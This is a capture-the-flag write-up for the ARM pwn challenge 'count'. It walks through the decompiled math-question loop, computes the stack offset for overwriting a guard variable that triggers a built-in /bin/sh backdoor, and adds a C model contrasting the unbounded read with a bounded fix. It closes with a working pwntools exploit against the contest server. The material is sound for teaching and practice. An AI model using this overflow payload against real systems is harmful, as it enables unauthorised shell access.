虎符CTF 2020 pwn: count
1410 views | 2020-04-19 | Category: pwn

count

The challenge provides a single ELF file. IDA shows it is built for ARM, which makes it awkward to debug locally.

The main function is as follows.

First, 200 simple math questions have to be answered correctly to reach the next stage.

do
  {
    v0 = time(0LL);
    v15 = v0;
    v1 = srand(v0);
    v2 = (unsigned int)((signed int)rand(v1) % 100);
    v14 = v2;
    v3 = (unsigned int)((signed int)rand(v2) % 100);
    v13 = v3;
    v4 = (unsigned int)((signed int)rand(v3) % 100);
    v12 = v4;
    v11 = (signed int)rand(v4) % 100;
    printf("there have 200 levels ~");
    printf("Math: %d * %d + %d + %d = ???");
    printf("input answer:");
    read(0LL, &v6, 20LL);
    v10 = v14 * v13 + v12 + v11;
    v9 = strtol(&v6, 0LL, 10LL);
    if ( v10 != v9 )
    {
      puts("wrong ");
      exit(0LL);
    }
    puts("good !");
    ++v16;
  }
  while ( v16 <= 199 );

The program has an obvious stack overflow:

  v8 = 256;
  read(0LL, &v7, 110LL);
  if ( v8 == 0x12235612 )
  {
    puts("get it ~");
    sub_400920();
  }

The program also ships with a built-in backdoor:

__int64 sub_400920()
{
  return system("/bin/sh");
}

Analysis shows that overflowing v7 lets the write reach the address of v8 and modify it; replacing the 256 stored in v8 with 0x12235612 is enough to run the backdoor.

By calculation, the distance between the address of v8 and the address of v7 is 0xDC - 0x78 = 0x64 bytes.
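To make the offset reasoning concrete, here is an added C model (not the challenge binary and not code from the original post) that reproduces the 0x64 distance between v7 and v8 in a struct and puts the unbounded read next to a bounded one; the struct layout, the host-endian 4-byte v8 and the function names are assumptions of the model.

```c
#include <stdint.h>
#include <string.h>

/* Added model, not the challenge binary: the struct only reproduces the
 * distance the writeup computes (v8 at 0xDC, v7 at 0x78, so 0x64 apart).
 * Assumed: v8 is a 4-byte integer in host byte order (little-endian on
 * AArch64, which is what the writeup's p64() produces). */
struct frame {
    unsigned char v7[0x64];    /* read() target                        */
    uint32_t      v8;          /* set to 256, compared with 0x12235612 */
    unsigned char rest[8];     /* keeps the model >= 110 bytes wide    */
};

#define READ_LEN 110           /* read(0, &v7, 110) in the binary      */
#define MAGIC    0x12235612u

/* Vulnerable form: copies up to READ_LEN bytes although v7 holds 0x64.
 * Returns 1 when v8 ends up equal to MAGIC (the backdoor branch). */
int vulnerable_check(const unsigned char *input, size_t n)
{
    struct frame f;
    memset(&f, 0, sizeof f);
    f.v8 = 256;
    if (n > READ_LEN) n = READ_LEN;
    memcpy(&f, input, n);      /* bytes 0x64..0x67 land in v8 */
    return f.v8 == MAGIC;
}

/* Hardened form: the copy is bounded by the destination buffer, so the
 * same input can never reach v8. */
int fixed_check(const unsigned char *input, size_t n)
{
    struct frame f;
    memset(&f, 0, sizeof f);
    f.v8 = 256;
    if (n > sizeof f.v7) n = sizeof f.v7;
    memcpy(f.v7, input, n);
    return f.v8 == MAGIC;
}

/* The writeup's payload: 0x64 filler bytes followed by MAGIC.
 * Returns the bytes written, or 0 if `out` is too small. */
size_t build_payload(unsigned char *out, size_t cap)
{
    const uint32_t magic = MAGIC;
    if (cap < 0x64 + sizeof magic) return 0;
    memset(out, 'a', 0x64);
    memcpy(out + 0x64, &magic, sizeof magic);
    return 0x64 + sizeof magic;
}
```

Bounding the copy by the destination size (or, equivalently, passing sizeof v7 to read) is the fix the decompiled code is missing; a stack canary would not help here because v8 is overwritten before any return.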

The exploit is as follows.

#!/usr/bin/env python3
# coding=utf-8
import re
from pwn import *

context.log_level = 'debug'

r = remote('39.97.210.182', 40285)

# 200 rounds of "Math: a * b + c + d = ???". The operands are printed, so the
# srand(time) seed never has to be reproduced; parse them instead of passing
# text received from the network to eval().
expr = re.compile(rb'(\d+) \* (\d+) \+ (\d+) \+ (\d+)')
for i in range(200):
    r.recvuntil(b'~Math: ')
    math = r.recvuntil(b'=')[:-1]
    a, b, c, d = map(int, expr.search(math).groups())
    r.sendline(str(a * b + c + d).encode())

# read(0, &v7, 110): 0x64 bytes of filler reach v8, then the value the check
# expects overwrites it so sub_400920() runs system("/bin/sh").
r.sendline(b'a' * 0x64 + p64(0x12235612))
r.interactive()
